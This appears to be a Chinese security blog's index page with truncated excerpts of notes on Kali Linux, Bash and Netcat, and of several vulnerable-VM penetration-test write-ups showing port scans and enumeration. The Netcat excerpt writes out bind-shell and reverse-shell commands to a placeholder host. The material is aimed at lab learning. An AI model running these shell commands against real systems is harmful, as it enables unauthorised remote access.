🎐清风.

# Netcat 很牛逼的工具，可以创建 TCP 或 UDP 的连接，同时可以是服务端也可以是客户端。 -n 跳过 dns 解析 -v 显示详情 -l 监听 -p 指定端口 可以使用重定向符号进行传文件的传递 -e 可以指定执行程序，并重定向输入输出到这个程序上，如: nc -lnvp 4444 -e cmd.exe ，然后使用 nc 连这个端口就能拿到 shell 当然上面那个是监听端启动 shell，也可以建立最常用的反向连接： nc -nv X.X.X.X 4444 -e /bin/bash # socat 用法： socat - TCP4:X.X.X.X:110 ，建立 110...

# 环境变量 Bash 是一种 shell，结合了 corn shell 和 seashell 的。 环境变量： $PATH 、 $NAME 、 $PWD 、 HOME$ 。 可以使用 export 定义一个环境变量，这样可以快速在当前 shell 和子 shell 中使用变量。如果不使用 export 导出，那么定义的变量只能在当前 shell 中使用。 可以通过 env 查看环境变量信息 # 历史命令 多的不赘述 按下 Ctrl + r 可以启用搜索功能，通过键入字符找到最近的相似命令，回车进行执行。 #...

最好使用 x64，确保一致性 创建后即时 passwd 修改密码 建议使用 kali 账户，使用 root 虽然方便但容易导致系统受损。使用 sodu 执行管理员权限。 预装了各种工具，坏蛋时间浏览菜单，帮助认识结构和工具。 关注 kali 官方文档和论坛，用来排除故障，工具站可以查询和定制工具。有时间可以看看。官网有使用手册和培训。网站的信息在 kali 的浏览器的收藏栏里。 简单介绍了一下目录结构。和 Linux 很像。 提供用户手册 man ， -k 参数可以更快速地定位需要查找的内容 ls 的使用，讲了可以使用通配符和 - al 参数 cd 的使用，还有 pwd find 、...

# 靶场搭建 下载，导入，开箱即食。 IP: 192.168.1.130 # 渗透测试 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 1024 cb:47:92:da:ea:b8:d3:82:16:22:0d:a5:5f:05:47:51 (DSA)| 2048 fd:93:9d:28:57:fb:ef:e0:8e:f1:93:66:03:67:35:50 (RSA)| 256...

# 靶机搭建 直接打开，导入，修改网卡为 NAT 模式 IP 地址： 192.168.174.131 # 渗透过程 # 信息初收集 21/tcp open ftp 22/tcp open ssh 80/tcp open http 使用 ftp 用户登录 ftp 看看，有一个用户列表的备份文件 21/tcp open ftp22/tcp open ssh80/tcp open http```plainabatchyjohnmaiannedoomguyabatchyjohnmaiannedoomguy扫描路径发现存在 robots.txt，打开后发现一个敏感目录...

# 靶场搭建 下载直接导入，设置成 NAT 模式，就能用了 IP： 192.168.1.128 # 渗透过程 # 信息初收集 33447/tcp open http Apache httpd 2.4.10 ((Ubuntu))只有一个端口，web 服务，那就说明你懂得 打开 web 服务端先 F12 看到提示 <!--0x643239334c6d70775a773d3d--> 16 进制转字符，base64 解码得到 wow.jpg ，访问毛都没有啊 dirsearch 扫到了 images，再加上 wow.jpg ，出来个吊图，binwalk 了一下也没问题啊...

# 靶场搭建 下载导入，直接启动就能用。 IP： 192.168.1.138 # 渗透过程 # 信息初收集 80 端口的 CMS 是 CMS Made Simple 2.2.15 。有 RCE 可以利用的，但是需要登录。 查看网站上的信息有两个用户 qiu 和 patrick 。提示了 backdoor 后门，就是那个 RCE 应该。 22/tcp open ssh80/tcp open http111/tcp closed rpcbind139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds3306/tcp...

# 靶场搭建 下载后导入虚拟机，直接启动 IP： 192.168.1.135 # 渗透过程 # 信息初收集 21/tcp open ftp22/tcp open ssh25/tcp open smtp80/tcp open http110/tcp open pop3139/tcp open netbios-ssn143/tcp open imap445/tcp open microsoft-ds465/tcp open smtps587/tcp open submission993/tcp open imaps995/tcp open pop3s21/tcp open ftp ProFTPD...

# 靶场搭建 下载，直接导入就能用 IP: 192.168.1.137 # 渗透过程 # 信息初收集 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http nginx 1.14.2 8080/tcp open http nginx 1.14.2 # http://192.168.1.137:8080/ [10:55:39] 200 - 2KB - /01 [10:55:39] 200 - 2KB - /1 [10:55:39] 200 - 2KB - /02 [10:55:39] 200...

# 靶场搭建 下载下来后直接导入就行 IP： 192.168.1.134 # 渗透过程 # 信息初收集 21/tcp open ftp22/tcp open ssh25/tcp open smtp80/tcp open http111/tcp open rpcbind139/tcp open netbios-ssn143/tcp open imap445/tcp open microsoft-ds631/tcp open ipp2049/tcp open nfs6667/tcp open irc6668/tcp open irc6669/tcp open irc6672/tcp open...